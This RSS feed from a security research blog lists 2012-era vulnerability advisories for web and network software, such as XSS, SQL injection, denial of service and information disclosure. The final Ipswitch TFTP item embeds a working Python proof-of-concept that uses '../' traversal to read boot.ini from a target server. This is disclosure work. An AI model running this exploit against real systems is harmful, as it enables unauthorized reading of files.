<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>SecPod Research Blog</title>
	<atom:link href="http://secpod.org/blog/?feed=rss2" rel="self" type="application/rss+xml" />
	<link>http://secpod.org/blog</link>
	<description>Security Simplified</description>
	<lastBuildDate>Fri, 30 Mar 2012 06:48:35 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>ArticleSetup Multiple Persistence Cross-Site Scripting and SQL Injection Vulnerabilities</title>
		<link>http://secpod.org/blog/?p=497</link>
		<comments>http://secpod.org/blog/?p=497#comments</comments>
		<pubDate>Fri, 30 Mar 2012 05:40:02 +0000</pubDate>
		<dc:creator>Veerendra GG</dc:creator>
				<category><![CDATA[Advisories]]></category>
		<category><![CDATA[Persistence XSS]]></category>
		<category><![CDATA[SQL]]></category>

		<guid isPermaLink="false">http://secpod.org/blog/?p=497</guid>
		<description><![CDATA[SecPod Research Team member (Antu Sanadi) has found Multiple Persistence Cross-Site Scripting and SQL Injection Vulnerabilities in ArticleSetup. The vulnerability is caused by improper validation of various parameters in multiple pages. This may allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying [...]]]></description>
			<content:encoded><![CDATA[<p>SecPod Research Team member (Antu Sanadi) has found Multiple Persistence Cross-Site Scripting and SQL Injection Vulnerabilities in ArticleSetup. The vulnerability is caused by improper validation of various parameters in multiple pages. This may allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.</p>
<p>More information can be found <a href="http://secpod.org/advisories/SecPod_ArticleSetup_Multiple_Vuln.txt" title="ArticleSetup Multiple Persistence Cross-Site Scripting and SQL Injection Vulnerabilities" target="_blank">here.</a></p>
<p>Welcome any feedback or suggestion.</p>
<p>Cheers!<br />
SecPod Research Team</p>
]]></content:encoded>
			<wfw:commentRss>http://secpod.org/blog/?feed=rss2&#038;p=497</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>JAMWiki &#8216;num&#8217; Parameter Cross Site Scripting Vulnerability</title>
		<link>http://secpod.org/blog/?p=493</link>
		<comments>http://secpod.org/blog/?p=493#comments</comments>
		<pubDate>Fri, 30 Mar 2012 05:30:47 +0000</pubDate>
		<dc:creator>Veerendra GG</dc:creator>
				<category><![CDATA[Advisories]]></category>
		<category><![CDATA[wiki]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">http://secpod.org/blog/?p=493</guid>
		<description><![CDATA[SecPod Research Team member (Sooraj K.S) has found Cross-Site Scripting Vulnerabilities in JAMWiki. The vulnerability is caused by improper validation of &#8220;num&#8221; parameter in &#8220;Special:AllPages&#8221; pages. This may allow an attacker to steal cookie-based authentication credentials or inject arbitrary HTML code and launch further attacks. More information can be found here. Welcome any feedback or [...]]]></description>
			<content:encoded><![CDATA[<p>SecPod Research Team member (Sooraj K.S) has found Cross-Site Scripting Vulnerabilities in JAMWiki. The vulnerability is caused by improper validation of &#8220;num&#8221; parameter in &#8220;Special:AllPages&#8221; pages. This may allow an attacker to steal cookie-based authentication credentials or inject arbitrary HTML code and launch further attacks.</p>
<p>More information can be found <a href="http://secpod.org/advisories/SecPod_JamWiki_XSS_Vuln.txt" title="JAMWiki 'num' Parameter Cross Site Scripting Vulnerability" target="_blank">here.</a></p>
<p>Welcome any feedback or suggestion.</p>
<p>Cheers!<br />
SecPod Research Team</p>
]]></content:encoded>
			<wfw:commentRss>http://secpod.org/blog/?feed=rss2&#038;p=493</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Netmechanica NetDecision HTTP Server Denial Of Service Vulnerability</title>
		<link>http://secpod.org/blog/?p=484</link>
		<comments>http://secpod.org/blog/?p=484#comments</comments>
		<pubDate>Tue, 28 Feb 2012 05:09:42 +0000</pubDate>
		<dc:creator>Veerendra GG</dc:creator>
				<category><![CDATA[Advisories]]></category>
		<category><![CDATA[Research]]></category>
		<category><![CDATA[BoF]]></category>
		<category><![CDATA[Buffer-Overflow]]></category>
		<category><![CDATA[dos]]></category>

		<guid isPermaLink="false">http://secpod.org/blog/?p=484</guid>
		<description><![CDATA[SecPod Research Team member (Prabhu S Angadi) has found Denial Of Service Vulnerability in Netmechanica NetDecision HTTP Server. The vulnerability is caused due to improper validation of long malicious HTTP request to web server, which allows remote attackers to crash the service. POC : Download here. More information can be found here. Welcome any feedback [...]]]></description>
			<content:encoded><![CDATA[<p>SecPod Research Team member (Prabhu S Angadi) has found Denial Of Service Vulnerability in Netmechanica NetDecision HTTP Server. The vulnerability is caused due to improper validation of long malicious HTTP request to web server, which allows remote attackers to crash the service.</p>
<p>POC : Download <a href="http://secpod.org/exploits/SecPod_Netmechanica_NetDecision_HTTP_Server_DoS_PoC.py" title="Netmechanica NetDecision HTTP Server Denial Of Service Vulnerability" target="_blank">here.</a></p>
<p>More information can be found <a href="http://secpod.org/advisories/SecPod_Netmechanica_NetDecision_HTTP_Server_DoS_Vuln.txt" title="Netmechanica NetDecision HTTP Server Denial Of Service Vulnerability" target="_blank">here.</a></p>
<p>Welcome any feedback or suggestion.</p>
<p>Cheers!<br />
SecPod Research Team</p>
]]></content:encoded>
			<wfw:commentRss>http://secpod.org/blog/?feed=rss2&#038;p=484</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Netmechanica NetDecision Traffic Grapher Server Information Disclosure Vulnerability</title>
		<link>http://secpod.org/blog/?p=481</link>
		<comments>http://secpod.org/blog/?p=481#comments</comments>
		<pubDate>Tue, 28 Feb 2012 05:04:46 +0000</pubDate>
		<dc:creator>Veerendra GG</dc:creator>
				<category><![CDATA[Advisories]]></category>
		<category><![CDATA[Research]]></category>
		<category><![CDATA[info-disc]]></category>
		<category><![CDATA[information-disclosure]]></category>

		<guid isPermaLink="false">http://secpod.org/blog/?p=481</guid>
		<description><![CDATA[SecPod Research Team member (Prabhu S Angadi) has found Information Disclosure Vulnerability in Netmechanica NetDecision Traffic Grapher Server. The vulnerability is caused due to improper validation of malicious HTTP GET request to Traffic Grapher Server &#8216;default.nd&#8217; with invalid HTTP version number followed by multiple &#8216;CRLF&#8217;, which discloses the source code of &#8216;default.nd&#8217; POC : Download [...]]]></description>
			<content:encoded><![CDATA[<p>SecPod Research Team member (Prabhu S Angadi) has found Information Disclosure Vulnerability in Netmechanica NetDecision Traffic Grapher Server. The vulnerability is caused due to improper validation of malicious HTTP GET request to Traffic Grapher Server &#8216;default.nd&#8217; with invalid HTTP version number followed by multiple &#8216;CRLF&#8217;, which discloses the source code of &#8216;default.nd&#8217;</p>
<p>POC : Download <a href="http://secpod.org/exploits/SecPod_Netmechanica_NetDecision_Traffic_Grapher_Server_SourceCode_Disc_PoC.py" title="Netmechanica NetDecision Traffic Grapher Server Information Disclosure Vulnerability" target="_blank">here.</a></p>
<p>More information can be found <a href="http://secpod.org/advisories/SecPod_Netmechanica_NetDecision_Traffic_Grapher_Server_SourceCode_Disc_Vuln.txt" title="Netmechanica NetDecision Traffic Grapher Server Information Disclosure Vulnerability" target="_blank">here.</a></p>
<p>Welcome any feedback or suggestion.</p>
<p>Cheers!<br />
SecPod Research Team</p>
]]></content:encoded>
			<wfw:commentRss>http://secpod.org/blog/?feed=rss2&#038;p=481</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Netmechanica NetDecision Dashboard Server Information Disclosure Vulnerability</title>
		<link>http://secpod.org/blog/?p=478</link>
		<comments>http://secpod.org/blog/?p=478#comments</comments>
		<pubDate>Tue, 28 Feb 2012 04:57:42 +0000</pubDate>
		<dc:creator>Veerendra GG</dc:creator>
				<category><![CDATA[Advisories]]></category>
		<category><![CDATA[Research]]></category>
		<category><![CDATA[information-disclosure]]></category>

		<guid isPermaLink="false">http://secpod.org/blog/?p=478</guid>
		<description><![CDATA[SecPod Research Team member (Prabhu S Angadi) has found Information Disclosure Vulnerability in Netmechanica NetDecision Dashboard Server. The vulnerability is caused due to improper validation of malicious HTTP request to Dashboard server appended with &#8216;?&#8217; character, which discloses the Dashboard server&#8217;s web script physical path. POC : Download here. More information can be found here. [...]]]></description>
			<content:encoded><![CDATA[<p>SecPod Research Team member (Prabhu S Angadi) has found Information Disclosure Vulnerability in Netmechanica NetDecision Dashboard Server. The vulnerability is caused due to improper validation of malicious HTTP request to Dashboard server appended with &#8216;?&#8217; character, which discloses the Dashboard server&#8217;s web script physical path.</p>
<p>POC : Download <a href="http://secpod.org/exploits/SecPod_Netmechanica_NetDecision_Dashboard_Server_Info_Disc_PoC.py" title="Netmechanica NetDecision Dashboard Server Information Disclosure Vulnerability" target="_blank">here.</a></p>
<p>More information can be found <a href="http://secpod.org/advisories/SecPod_Netmechanica_NetDecision_Dashboard_Server_Info_Disc_Vuln.txt" title="Netmechanica NetDecision Dashboard Server Information Disclosure Vulnerability" target="_blank">here.</a></p>
<p>Welcome any feedback or suggestion.</p>
<p>Cheers!<br />
SecPod Research Team</p>
]]></content:encoded>
			<wfw:commentRss>http://secpod.org/blog/?feed=rss2&#038;p=478</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>OfficeSIP Server Denial Of Service Vulnerability</title>
		<link>http://secpod.org/blog/?p=461</link>
		<comments>http://secpod.org/blog/?p=461#comments</comments>
		<pubDate>Wed, 01 Feb 2012 09:26:22 +0000</pubDate>
		<dc:creator>Veerendra GG</dc:creator>
				<category><![CDATA[Advisories]]></category>
		<category><![CDATA[Exploits]]></category>
		<category><![CDATA[Research]]></category>
		<category><![CDATA[dos]]></category>
		<category><![CDATA[exploit]]></category>

		<guid isPermaLink="false">http://secpod.org/blog/?p=461</guid>
		<description><![CDATA[SecPod Research Team member (Prabhu S Angadi) has found Denial Of Service Vulnerability in OfficeSIP Server. The vulnerability is caused due to improper validation of SIP/SIPS URI in the &#8216;To&#8217; header of the request. The flaw can be exploited to crash the service. POC : Download here. More information can be found here. Welcome any [...]]]></description>
			<content:encoded><![CDATA[<p>SecPod Research Team member (Prabhu S Angadi) has found Denial Of Service Vulnerability in OfficeSIP Server. The vulnerability is caused due to improper validation of SIP/SIPS URI in the &#8216;To&#8217; header of the request. The flaw can be exploited to crash the service.</p>
<p>POC : Download <a href="http://secpod.org/exploits/SecPod_Exploit_OfficeSIP_Server_DOS.py" title="OfficeSIP Server Denial Of Service Vulnerability - PoC" target="_blank">here</a>.</p>
<p>More information can be found <a href="http://secpod.org/advisories/SecPod_Exploit_OfficeSIP_Server_DOS_Vuln.txt" title="OfficeSIP Server Denial Of Service Vulnerability" target="_blank">here</a>.</p>
<p>Welcome any feedback or suggestion.</p>
<p>Cheers!<br />
SecPod Research Team</p>
]]></content:encoded>
			<wfw:commentRss>http://secpod.org/blog/?feed=rss2&#038;p=461</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>NetSarang Xlpd Printer Daemon Denial of Service Vulnerability</title>
		<link>http://secpod.org/blog/?p=457</link>
		<comments>http://secpod.org/blog/?p=457#comments</comments>
		<pubDate>Wed, 01 Feb 2012 09:21:04 +0000</pubDate>
		<dc:creator>Veerendra GG</dc:creator>
				<category><![CDATA[Advisories]]></category>
		<category><![CDATA[Exploits]]></category>
		<category><![CDATA[dos]]></category>
		<category><![CDATA[exploit]]></category>

		<guid isPermaLink="false">http://secpod.org/blog/?p=457</guid>
		<description><![CDATA[SecPod Research Team member (Prabhu S Angadi) has found Denial of Service Vulnerability in NetSarang Xlpd Printer Daemon. The vulnerability is caused due to improper validation of malicious LPD request sent to printer daemon. The flaw can be exploited to crash the service. POC : Download here. More information can be found here. Welcome any [...]]]></description>
			<content:encoded><![CDATA[<p>SecPod Research Team member (Prabhu S Angadi) has found Denial of Service Vulnerability in NetSarang Xlpd Printer Daemon. The vulnerability is caused due to improper validation of malicious LPD request sent to printer daemon. The flaw can be exploited to crash the service.</p>
<p>POC : Download <a href="http://secpod.org/exploits/SecPod_Exploit_NetSarang_Xlpd_Printer_Daemon_DoS.py" title="NetSarang Xlpd Printer Daemon Denial of Service Vulnerability - PoC" target="_blank">here</a>.</p>
<p>More information can be found <a href="http://secpod.org/advisories/SecPod_Exploit_NetSarang_Xlpd_Printer_Daemon_DoS_Vuln.txt" title="NetSarang Xlpd Printer Daemon Denial of Service Vulnerability" target="_blank">here</a>.</p>
<p>Welcome any feedback or suggestion.</p>
<p>Cheers!<br />
SecPod Research Team</p>
]]></content:encoded>
			<wfw:commentRss>http://secpod.org/blog/?feed=rss2&#038;p=457</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Sphinix Mobile Web Server Multiple Persistence XSS Vulnerabilities</title>
		<link>http://secpod.org/blog/?p=453</link>
		<comments>http://secpod.org/blog/?p=453#comments</comments>
		<pubDate>Wed, 01 Feb 2012 09:14:55 +0000</pubDate>
		<dc:creator>Veerendra GG</dc:creator>
				<category><![CDATA[Advisories]]></category>
		<category><![CDATA[Research]]></category>
		<category><![CDATA[Persistence XSS]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">http://secpod.org/blog/?p=453</guid>
		<description><![CDATA[SecPod Research Team member (Prabhu S Angadi) has found Multiple Persistence Cross-Site Scripting Vulnerabilities in Sphinix Mobile Web Server Blog. The vulnerability is caused by improper validation of &#8220;comment&#8221; parameter in &#8220;/Blog/MyFirstBlog.txt&#8221; and &#8220;/Blog/AboutSomething.txt&#8221; pages. This may allow an attacker to steal cookie-based authentication credentials or inject arbitrary HTML code and launch further attacks. More [...]]]></description>
			<content:encoded><![CDATA[<p>SecPod Research Team member (Prabhu S Angadi) has found Multiple Persistence Cross-Site Scripting Vulnerabilities in Sphinix Mobile Web Server Blog. The vulnerability is caused by improper validation of &#8220;comment&#8221; parameter in &#8220;/Blog/MyFirstBlog.txt&#8221; and &#8220;/Blog/AboutSomething.txt&#8221; pages. This may allow an attacker to steal cookie-based authentication credentials or inject arbitrary HTML code and launch further attacks.</p>
<p>More information can be found <a href="http://secpod.org/advisories/SecPod_SPHINX_SOFT_Mobile_Web_Server_Mul_Persistence_XSS_Vulns.txt" title="Sphinix Mobile Web Server Multiple Persistence XSS Vulnerabilities" target="_blank">here</a>.</p>
<p>Welcome any feedback or suggestion.</p>
<p>Cheers!<br />
SecPod Research Team</p>
]]></content:encoded>
			<wfw:commentRss>http://secpod.org/blog/?feed=rss2&#038;p=453</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Apache Struts Multiple Persistence Cross-Site Scripting Vulnerabilities</title>
		<link>http://secpod.org/blog/?p=450</link>
		<comments>http://secpod.org/blog/?p=450#comments</comments>
		<pubDate>Wed, 01 Feb 2012 09:08:47 +0000</pubDate>
		<dc:creator>Veerendra GG</dc:creator>
				<category><![CDATA[Advisories]]></category>
		<category><![CDATA[Research]]></category>
		<category><![CDATA[Persistence XSS]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">http://secpod.org/blog/?p=450</guid>
		<description><![CDATA[SecPod Research Team member (Antu Sanadi) has found Multiple Persistence Cross-Site Scripting Vulnerabilities in Apache Struts. The vulnerability is caused by improper validation of various parameters in multiple pages. This may allow an attacker to steal cookie-based authentication credentials or inject arbitrary HTML code and launch further attacks. More information can be found here. Welcome [...]]]></description>
			<content:encoded><![CDATA[<p>SecPod Research Team member (Antu Sanadi) has found Multiple Persistence Cross-Site Scripting Vulnerabilities in Apache Struts. The vulnerability is caused by improper validation of various parameters in multiple pages. This may allow an attacker to steal cookie-based authentication credentials or inject arbitrary HTML code and launch further attacks.</p>
<p>More information can be found <a href="http://secpod.org/advisories/SecPod_Apache_Struts_Multiple_Parsistant_XSS_Vulns.txt" title="Apache Struts Multiple Persistence Cross-Site Scripting Vulnerabilities" target="_blank">here</a>.</p>
<p>Welcome any feedback or suggestion.</p>
<p>Cheers!<br />
SecPod Research Team</p>
]]></content:encoded>
			<wfw:commentRss>http://secpod.org/blog/?feed=rss2&#038;p=450</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Ipswitch TFTP Server Directory Traversal Vulnerability</title>
		<link>http://secpod.org/blog/?p=424</link>
		<comments>http://secpod.org/blog/?p=424#comments</comments>
		<pubDate>Fri, 02 Dec 2011 06:21:35 +0000</pubDate>
		<dc:creator>Veerendra GG</dc:creator>
				<category><![CDATA[Advisories]]></category>
		<category><![CDATA[Directory Traversal]]></category>
		<category><![CDATA[information-disclosure]]></category>
		<category><![CDATA[tftp]]></category>
		<category><![CDATA[vulnerability]]></category>

		<guid isPermaLink="false">http://secpod.org/blog/?p=424</guid>
		<description><![CDATA[SecPod Research Team member (Prabhu S Angadi) has found a Directory Traversal vulnerability in Ipswitch TFTP Server. The vulnerability is caused due to improper validation of ‘Read’ request containing ‘../’ sequences. The flaw can be exploited to read arbitrary files via directory traversal attacks. POC : Download here. More information on the flaws can be [...]]]></description>
			<content:encoded><![CDATA[<p>SecPod Research Team member (Prabhu S Angadi) has found a Directory Traversal vulnerability in Ipswitch TFTP Server. The vulnerability is caused due to improper validation of ‘Read’ request containing ‘../’ sequences. The flaw can be exploited to read arbitrary files via directory traversal attacks.</p>
<p>POC : Download <a href="http://secpod.org/exploits/SecPod_Ipswitch_TFTP_Server_Dir_Trav_POC.py" title="Ipswitch TFTP Server Directory Traversal Vulnerability" target="_blank">here.</a></p>
<p>More information on the flaws can be found <a href="http://secpod.org/advisories/SecPod_Ipswitch_TFTP_Server_Dir_Trav.txt" title="Ipswitch TFTP Server Directory Traversal Vulnerability" target="_blank">here.</a></p>
<pre><code>#!/usr/bin/python
##############################################################################
# Title     : Ipswitch TFTP Server Directory Traversal Vulnerability
# Author    : Prabhu S Angadi from SecPod Technologies (www.secpod.com)
# Vendor    : http://www.whatsupgold.com/index.aspx
# Advisory  : http://secpod.org/blog/?p=424
#             http://secpod.org/advisories/SecPod_Ipswitch_TFTP_Server_Dir_Trav.txt
#             http://secpod.org/exploits/SecPod_Ipswitch_TFTP_Server_Dir_Trav_POC.py
# Version   : Ipswitch TFTP Server 1.0.0.24
# Date      : 02/12/2011
##############################################################################

import sys, socket

def sendPacket(HOST, PORT, data):
    '''
    Sends UDP Data to a Particular Host on a Specified Port
    with a Given Data and Return the Response
    '''

    udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    udp_sock.sendto(data, (HOST, PORT))
    data = udp_sock.recv(1024)
    udp_sock.close()

    return data

if __name__ == "__main__":

    if len(sys.argv) < 2:
        print '\tUsage: python exploit.py target_ip'
        print '\tExample : python exploit.py 127.0.0.1'
        print '\tExiting...'
        sys.exit(0)

    HOST = sys.argv[1]                               ## The Server IP
    PORT = 69                                        ## Default TFTP port

    data = "\x00\x01"                                ## TFTP Read Request
    data += "../" * 10 + "boot.ini" + "\x00"         ## Read boot.ini file using directory traversal
    data += "netascii\x00"                           ## TFTP Type

    ## netascii
    rec_data = sendPacket(HOST, PORT, data)
    print "Data Found on the target : %s " %(HOST)
    print rec_data.strip()
</code></pre>
<p>Welcome any feedback or suggestion.</p>
<p>Cheers!<br />
SecPod Research Team</p>
]]></content:encoded>
			<wfw:commentRss>http://secpod.org/blog/?feed=rss2&#038;p=424</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
	</channel>
</rss>

